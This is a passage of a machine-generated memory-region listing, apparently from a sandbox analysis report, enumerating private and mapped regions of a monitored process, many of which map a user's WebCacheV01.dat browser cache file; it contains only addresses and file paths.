"c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3580 start_va = 0x24c0000 end_va = 0x24c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 3581 start_va = 0x24d0000 end_va = 0x24d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 3582 start_va = 0x24e0000 end_va = 0x24e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 3583 start_va = 0x2530000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3584 start_va = 0x2540000 end_va = 0x2547fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 3585 start_va = 0x2550000 end_va = 0x2557fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 3586 start_va = 0x2560000 end_va = 0x2567fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 3587 start_va = 0x2570000 end_va = 0x2570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 3588 start_va = 0x2580000 end_va = 0x2587fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 3589 start_va = 0x2590000 end_va = 0x2597fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 3590 start_va = 0x2570000 end_va = 0x2570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 3591 start_va = 0x2570000 end_va = 0x2570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 3592 start_va = 0x2570000 end_va = 0x2577fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 3593 start_va = 0x2570000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3594 start_va = 0x25a0000 end_va = 0x25a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 3595 start_va = 0x25b0000 end_va = 0x25b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 3596 start_va = 0x39a0000 end_va = 0x39a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039a0000" filename = "" Region: id = 3597 start_va = 0x39b0000 end_va = 0x39b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039b0000" filename = "" Region: id = 3598 start_va = 0x39c0000 end_va = 0x39c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039c0000" filename = "" Region: id = 3599 start_va = 0x3a20000 end_va = 0x3a27fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 3600 start_va = 0x3a70000 end_va = 0x3a77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a70000" filename = "" Region: id = 3601 start_va = 0x3a90000 end_va = 0x3a97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a90000" filename = "" Region: id = 3602 start_va = 0x3aa0000 end_va = 0x3aa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003aa0000" filename = "" Region: id = 3603 start_va = 0x3ab0000 end_va = 0x3ab7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ab0000" filename = "" Region: id = 3604 start_va = 0x3ac0000 end_va = 0x3ac7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ac0000" filename = "" Region: id = 3605 start_va = 0x3c90000 end_va = 0x3c97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 3606 start_va = 0x3eb0000 end_va = 0x3eb7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 3607 start_va = 0x3ec0000 end_va = 0x3ec7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 3608 start_va = 0x3ed0000 end_va = 0x3ed7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 3609 start_va = 0x3ee0000 end_va = 0x3ee7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 3610 start_va = 0x3ef0000 end_va = 0x3ef7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 3611 start_va = 0x3f00000 end_va = 0x3f07fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 3612 start_va = 0x3f10000 end_va = 0x3f17fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f10000" filename = "" Region: id = 3613 start_va = 0x3f20000 end_va = 0x3f27fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f20000" filename = "" Region: id = 3614 start_va = 0x3f30000 end_va = 0x3f37fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f30000" filename = "" Region: id = 3615 start_va = 0x3f40000 end_va = 0x3f47fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f40000" filename = "" Region: id = 3616 start_va = 0x3f50000 end_va = 0x3f57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f50000" filename = "" Region: id = 3617 start_va = 0x3f60000 end_va = 0x3f67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f60000" filename = "" Region: id = 3618 start_va = 0x3f70000 end_va = 0x3f77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f70000" filename = "" Region: id = 3619 start_va = 0x3f80000 end_va = 0x3f87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f80000" filename = "" Region: id = 3620 start_va = 0x3f90000 end_va = 0x3f97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f90000" filename = "" Region: id = 3621 start_va = 0x3fa0000 end_va = 0x3fa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fa0000" filename = "" Region: id = 3622 start_va = 0x40b0000 end_va = 0x40b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 3623 start_va = 0x40c0000 end_va = 0x40c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 3624 start_va = 0x40d0000 end_va = 0x40d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3625 start_va = 0x40d0000 end_va = 0x40d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3626 start_va = 0x40d0000 end_va = 0x40d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3627 start_va = 0x40d0000 end_va = 0x40d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3628 start_va = 0x40e0000 end_va = 0x40e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 3629 start_va = 0x40f0000 end_va = 0x40f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3630 start_va = 0x4100000 end_va = 0x4107fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 3631 start_va = 0x4110000 end_va = 0x4117fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3632 start_va = 0x4120000 end_va = 0x4127fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3633 start_va = 0x4130000 end_va = 0x4137fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 3634 start_va = 0x4140000 end_va = 0x4147fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 3635 start_va = 0x4150000 end_va = 0x4157fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 3636 start_va = 0x4160000 end_va = 0x4167fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 3637 start_va = 0x4170000 end_va = 0x4177fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 3638 start_va = 0x4180000 end_va = 0x4187fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 3639 start_va = 0x4190000 end_va = 0x4197fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 3640 start_va = 0x41a0000 end_va = 0x41a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041a0000" filename = "" Region: id = 3641 start_va = 0x41b0000 end_va = 0x41b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041b0000" filename = "" Region: id = 3642 start_va = 0x41c0000 end_va = 0x41c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 3643 start_va = 0x41d0000 end_va = 0x41d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 3644 start_va = 0x41e0000 end_va = 0x41e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 3645 start_va = 0x41f0000 end_va = 0x41f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 3646 start_va = 0x4200000 end_va = 0x4207fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 3647 start_va = 0x4210000 end_va = 0x4217fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 3648 start_va = 0x4220000 end_va = 0x4227fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004220000" filename = "" Region: id = 3649 start_va = 0x4230000 end_va = 0x4237fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004230000" filename = "" Region: id = 3650 start_va = 0x4240000 end_va = 0x4247fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004240000" filename = "" Region: id = 3651 start_va = 0x4250000 end_va = 0x4257fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 3652 start_va = 0x4260000 end_va = 0x4267fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 3653 start_va = 0x4270000 end_va = 0x4277fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 3654 start_va = 0x4280000 end_va = 0x4287fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004280000" filename = "" Region: id = 3655 start_va = 0x4290000 end_va = 0x4297fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 3656 start_va = 0x42a0000 end_va = 0x42a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 3657 start_va = 0x42b0000 end_va = 0x42b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042b0000" filename = "" Region: id = 3658 start_va = 0x42b0000 end_va = 0x42b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042b0000" filename = "" Region: id = 3659 start_va = 0x42b0000 end_va = 0x42b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042b0000" filename = "" Region: id = 3660 start_va = 0x42b0000 end_va = 0x42b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042b0000" filename = "" Region: id = 3661 start_va = 0x42c0000 end_va = 0x42c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042c0000" filename = "" Region: id = 3662 start_va = 0x42d0000 end_va = 0x42d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 3663 start_va = 0x42e0000 end_va = 0x42e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 3664 start_va = 0x42f0000 end_va = 0x42f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 3665 start_va = 0x4300000 end_va = 0x4307fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 3666 start_va = 0x4310000 end_va = 0x4317fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004310000" filename = "" Region: id = 3667 start_va = 0x4320000 end_va = 0x4325fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004320000" filename = "" Region: id = 3668 start_va = 0x4330000 end_va = 0x4337fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004330000" filename = "" Region: id = 3669 start_va = 0x4320000 end_va = 0x432ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3670 start_va = 0x24c0000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3671 start_va = 0x24d0000 end_va = 0x24dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3672 start_va = 0x24e0000 end_va = 0x24effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3673 start_va = 0x2540000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3674 start_va = 0x2550000 end_va = 0x255ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3675 start_va = 0x2560000 end_va = 0x256ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3676 start_va = 0x2580000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3677 start_va = 0x2590000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3678 start_va = 0x25a0000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3679 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3680 start_va = 0x39a0000 end_va = 0x39affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3681 start_va = 0x39b0000 end_va = 0x39bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3682 start_va = 0x39c0000 end_va = 0x39cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3683 start_va = 0x3a20000 end_va = 0x3a2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3684 start_va = 0x3a70000 end_va = 0x3a7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3685 start_va = 0x3a90000 end_va = 0x3a9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3686 start_va = 0x3aa0000 end_va = 0x3aaffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3687 start_va = 0x3ab0000 end_va = 0x3abffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3688 start_va = 0x3ac0000 end_va = 0x3acffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3689 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3690 start_va = 0x3eb0000 end_va = 0x3ebffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3691 start_va = 0x3ec0000 end_va = 0x3ecffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3692 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3693 start_va = 0x3ee0000 end_va = 0x3eeffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3694 start_va = 0x3ef0000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3695 start_va = 0x3f00000 end_va = 0x3f0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3696 start_va = 0x3f10000 end_va = 0x3f1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3697 start_va = 0x3f20000 end_va = 0x3f2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3698 start_va = 0x3f30000 end_va = 0x3f3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3699 start_va = 0x3f40000 end_va = 0x3f4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3700 start_va = 0x3f50000 end_va = 0x3f5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3701 start_va = 0x3f60000 end_va = 0x3f6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3702 start_va = 0x3f70000 end_va = 0x3f7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3703 start_va = 0x40c0000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3704 start_va = 0x3f80000 end_va = 0x3f8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3705 start_va = 0x3f90000 end_va = 0x3f9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3706 start_va = 0x3fa0000 end_va = 0x3faffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3707 start_va = 0x40b0000 end_va = 0x40bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3708 start_va = 0x40d0000 end_va = 0x40dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3709 start_va = 0x40e0000 end_va = 0x40effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3710 start_va = 0x40f0000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3711 start_va = 0x4100000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = 